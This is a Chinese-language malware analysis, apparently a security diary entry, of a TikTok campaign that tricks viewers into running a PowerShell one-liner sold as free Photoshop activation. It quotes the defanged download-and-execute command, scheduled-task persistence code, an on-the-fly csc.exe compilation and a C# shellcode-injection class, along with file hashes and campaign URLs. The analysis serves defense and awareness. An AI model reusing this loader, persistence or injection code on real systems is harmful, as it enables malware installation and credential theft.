TikTok视频推广恶意软件安装
攻击者无处不在!他们试图利用新的通信渠道和社会工程技术来欺骗受害者。有人向我指出了以下TikTok视频:hxxps://vm[.]tiktok[.]com/ZGdaCkbEF/。
视频作者假装为您提供免费激活Photoshop的简单方法:
请注意,该视频已被点赞超过500次!
该技术与ClickFix[1]攻击场景类似。受害者被要求以管理员身份启动PowerShell并执行单行命令:
1
|
iex (irm slmgr[.]win/photoshop)
|
访问此链接时,您将获得一段恶意的PowerShell代码并被执行(SHA256:6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23)。其在VirusTotal上的得分为17/63[2]。让我们来看一下!
它从https://file-epq[.]pages[.]dev/updater.exe下载下一阶段。持久性通过计划任务在登录时执行来实现:
1
2
3
4
5
6
7
|
$tasknames = @('MicrosoftEdgeUpdateTaskMachineCore','GoogleUpdateTaskMachineCore','AdobeUpdateTask','OfficeBackgroundTaskHandlerRegistration','WindowsUpdateCheck')
$taskname = $tasknames[(Get-Random -Max 5)]
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -ExecutionPolicy Bypass -Command `"$scr`""
$trigger = New-ScheduledTaskTrigger -AtLogOn
$principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive -RunLevel Highest
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -DontStopOnIdleEnd
Register-ScheduledTask -TaskName $taskname -Action $action -Trigger $trigger -Principal $principal -Settings $settings -Force -ErrorAction SilentlyContinue | Out-Null
|
Updater.exe(SHA256:58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8)是一个AuroStealer[3]。
最后,下载并执行第二个有效负载:source.exe(SHA256:db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011)[4]。这个实现了一个有趣的技术,它在执行期间按需编译一些代码:
1
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline"
|
这是我在之前的日记中提到的内容(“自编译恶意软件”)[5]。编译的代码是一个用于在内存中注入shellcode的类:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
using System;
using System.Runtime.InteropServices;
public class SC {
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr a, uint s, uint t, uint p);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr a, uint s, IntPtr addr, IntPtr p, uint f, IntPtr t);
[DllImport("kernel32.dll")]
public static extern uint WaitForSingleObject(IntPtr h, uint m);
public static void Run(byte[] sc) {
IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40);
Marshal.Copy(sc, 0, addr, sc.Length);
IntPtr t = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
WaitForSingleObject(t, 0xFFFFFFFF);
}
}
|
在调查这个恶意软件时,我发现了来自同一活动的更多视频,但使用了其他软件名称:
- hxxps://vm[.]tiktok[.]com/ZGdaC7EQY/
- hxxps://vm[.]tiktok[.]com/ZGdaX8jVq/
保持安全,不要相信此类视频!
参考资料
[1] https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
[2] https://www.virustotal.com/gui/file/6d897b5661aa438a96ac8695c54b7c4f3a1fbf1b628c8d2011e50864860c6b23
[3] https://malpedia.caad.fkie.fraunhofer.de/details/win.aurastealer
[4] https://www.virustotal.com/gui/file/db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011
[5] https://isc.sans.edu/diary/Malware+Samples+Compiling+Their+Next+Stage+on+Premise/25278